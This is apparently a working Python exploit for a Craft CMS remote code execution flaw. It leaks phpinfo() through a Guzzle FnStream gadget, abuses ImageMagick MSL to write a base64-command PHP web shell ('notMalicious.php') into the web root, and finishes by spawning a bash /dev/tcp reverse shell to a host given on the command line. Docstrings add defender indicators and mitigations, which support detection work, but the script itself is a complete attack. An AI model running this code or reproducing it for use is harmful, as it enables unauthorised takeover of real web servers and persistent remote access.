import requests
import re
import sys
import argparse
import base64
# Browser-like User-Agent sent on every request. Defender note: the UA alone
# is a weak signal; the request parameters (a POST to the "conditions/render"
# action carrying a "configObject[class]" field) are what no real browser
# session would produce.
headers = dict()
headers["User-Agent"] = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36"
)
# Name of the PHP file the deploy step writes under the document root; a file
# with this name appearing in the web root is a concrete indicator of this
# script having run against the host.
phpFileName = "notMalicious.php"
def deployPhpFile(documentRoot: str, tmpDir: str) -> None:
    """Write a PHP command runner into the target's document root via ImageMagick MSL.

    One multipart POST to the module-level ``url`` carries two parts:
      * ``data``: the ``conditions/render`` action with a ``config`` JSON that
        asks the application to instantiate the ``Imagick`` class with a
        ``vid:msl:<tmpDir>/php*`` path, i.e. to treat the just-uploaded temp
        file(s) in ``tmpDir`` as an MSL script.
      * ``files``: the MSL document itself (field ``image1``, ``pwn1.msl``).
        Its ``<read filename="caption:...">`` carries the PHP one-liner as
        caption text and ``<write filename="info:<documentRoot>/<phpFileName>">``
        makes ImageMagick write a file under the web root; the caption text is
        presumably preserved in that file, which is what ``shell()`` relies on.

    Args:
        documentRoot: web root as reported by the target (see
            getTmpUploadDirAndDocumentRoot); the PHP file is written there.
        tmpDir: PHP upload temp dir on the target, used in the ``vid:msl:`` path.

    Raises:
        requests.HTTPError: for any non-2xx status other than 502.

    Defender notes (what this looks like on the wire and on disk):
      * a POST body with ``action=conditions/render``, a ``configObject[class]``
        field and a ``config`` JSON naming an arbitrary class (``Imagick``) with
        ``__construct()`` arguments — a shape no legitimate UI emits;
      * a multipart upload whose filename ends in ``.msl`` and whose body
        contains ``<?php``; the string ``vid:msl:`` anywhere in a request body;
      * a new ``.php`` file (``phpFileName``) appearing in the document root.
      Mitigation: apply the vendor fix for the affected application version and
      disable the MSL coder in ImageMagick's ``policy.xml`` so uploaded files
      cannot be interpreted as MSL scripts.
    """
    data = {
        "action": "conditions/render",
        # Non-raw string: "\e", "\c" and "\E" are not Python escapes, so the
        # backslashes survive as-is, but recent Pythons emit a SyntaxWarning.
        "configObject[class]": "craft\elements\conditions\ElementCondition",
        "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmpDir + r'/php*"}}}'
    }
    files = {
        "image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:<?php @system(@base64_decode(@$_REQUEST['cmd'])); ?>"/>
<write filename="info:PHPFILE">
</image>""".replace("PHPFILE", documentRoot + "/"+ phpFileName), "text/plain")
    }
    response = requests.post(url, headers=headers, data=data, files=files)
    # 502 is good: the author treats a gateway error as the success case here
    # (presumably the PHP worker dies after the file has been written — not
    # verified by anything in this script).
    if response.status_code != 502:
        response.raise_for_status()
def getTmpUploadDirAndDocumentRoot() -> tuple[str, str]:
    """Recover the target's upload temp dir and document root from phpinfo() output.

    Sends the ``conditions/render`` action with a ``config`` JSON that
    instantiates ``GuzzleHttp\\Psr7\\FnStream`` with
    ``methods: {"close": "phpinfo"}``, so the stream's ``close`` callback is
    ``phpinfo`` and its HTML ends up in the response body. Two regexes then
    pull ``upload_tmp_dir`` and ``$_SERVER['DOCUMENT_ROOT']`` out of that HTML.

    Returns:
        ``(upload_tmp_dir, document_root)`` as printed by phpinfo. The first
        element may be the literal ``no value`` text when the directive is
        unset; the caller checks for that.

    Raises:
        requests.HTTPError: on a non-2xx response.
        AttributeError: when either regex does not match (for example on a
            patched target that returns no phpinfo output) — ``match1`` /
            ``match2`` are then None and ``.group`` is called on None.
            NOTE(review): checking for None first would give a clearer failure.

    Defender notes: phpinfo() HTML served in response to ``conditions/render``,
    or a request ``config`` naming ``FnStream`` with ``__construct()`` arguments,
    is a reliable indicator of this probe; phpinfo output should never be
    reachable by an unauthenticated client.
    """
    data = {
        "action": "conditions/render",
        # Non-raw string: "\e", "\c" and "\E" are not Python escapes, so the
        # backslashes survive as-is, but recent Pythons emit a SyntaxWarning.
        "configObject[class]": "craft\elements\conditions\ElementCondition",
        "config": r'{"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
    }
    response = requests.post(url, headers=headers, data=data)
    response.raise_for_status()
    # phpinfo renders a directive row with two value cells; pattern1 captures
    # both and group(1) is the first one (presumably the "Local Value" column).
    pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>'
    # DOCUMENT_ROOT is a single-value row, so one capture group suffices.
    pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>'
    match1 = re.search(pattern1, response.text, re.DOTALL)
    match2 = re.search(pattern2, response.text, re.DOTALL)
    return match1.group(1), match2.group(1)
def shell(cmd):
    """Run one command through the deployed PHP file and return its output.

    ``cmd`` is base64-encoded and sent as the ``cmd`` query parameter of
    ``<url>/<phpFileName>`` (both module globals); the PHP side decodes and
    runs it. The reply is scanned for text between ``caption:`` and
    ``CAPTION`` — the output is expected to sit between those markers because
    the PHP one-liner was embedded as an ImageMagick caption (see deployPhpFile).

    Args:
        cmd: shell command line to run on the target.

    Returns:
        The stripped text between the markers, or None when the markers are
        absent from the response body.

    Raises:
        requests.HTTPError: on a non-2xx response.

    Defender note: every call is a GET to an unexpected ``.php`` path with a
    base64 ``cmd`` parameter — easy to alert on from access logs, and decoding
    the parameter reveals the exact commands that were run.
    """
    encoded = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")
    print("[-] Executing cmd [{}] base64 encoded: [{}]".format(cmd, encoded))
    endpoint = "{}/{}".format(url, phpFileName)
    reply = requests.get(endpoint, params={"cmd": encoded})
    reply.raise_for_status()
    found = re.search(r"caption:(.*?)CAPTION", reply.text, re.DOTALL)
    if found is None:
        return None
    return found.group(1).strip()
if __name__ == "__main__":
    # CLI: positional target URL plus the host/port the final command connects
    # back to. ``url`` is read as a module global by the helper functions above,
    # so it must be assigned before any of them is called.
    parser = argparse.ArgumentParser()
    parser.add_argument("url")
    parser.add_argument("-r","--remote-host", required=True)
    parser.add_argument("-p","--port", required=True)
    args = parser.parse_args()
    url = args.url
    port = args.port
    host = args.remote_host
    try:
        # Step 1: obtain upload_tmp_dir and DOCUMENT_ROOT from the phpinfo() page.
        print("[-] Get temporary folder and document root ...")
        upload_tmp_dir, documentRoot = getTmpUploadDirAndDocumentRoot()
        # phpinfo presumably prints "no value" for an unset directive; the
        # script then assumes the system temp dir is /tmp.
        if "no value" in upload_tmp_dir:
            upload_tmp_dir = "/tmp"
        print("[-] Temporary Folder: [{}] Document Root: [{}]".format(upload_tmp_dir, documentRoot))
        # Step 2: write the PHP file into the document root (see deployPhpFile).
        print("[-] Deploy PHP file {} ...".format(phpFileName))
        deployPhpFile(documentRoot, upload_tmp_dir)
        # Step 3: first command through the new file — remove the leftover
        # upload temp files (php*) from the temp dir. Defender note: the PHP
        # file in the document root is NOT removed; it remains as evidence.
        print("[-] Delete /tmp/php*")
        shell("rm {}/php*".format(upload_tmp_dir))
        # Step 4: outbound interactive shell from the web server to host:port.
        # Defender note: an outbound TCP connection from a PHP worker to an
        # arbitrary host/port is the high-signal event here; egress filtering
        # on the web tier stops it.
        # NOTE(review): this print lacks the ``f`` prefix, so it shows the
        # literal text "{host}:{port}" instead of the values.
        print("[-] Spawning reverse shell to {host}:{port}")
        shell("bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(host,port))
        print("[-] Done for today")
        # Disabled interactive loop left in place by the author.
        #while True:
        # cmd = input("$ ")
        # shell(cmd)
    # Error handling: each requests exception type is reported and the script
    # exits normally; nothing already written to the target is cleaned up.
    except requests.exceptions.ConnectionError:
        print("[X] A connection error occurred. Cannot connect to:", url)
    except requests.exceptions.Timeout:
        print("[X] The request timed out.")
    except requests.exceptions.HTTPError as e:
        print("[X] HTTP Error:", e)
    except requests.exceptions.RequestException as e:
        print("[X] An error occurred:", e)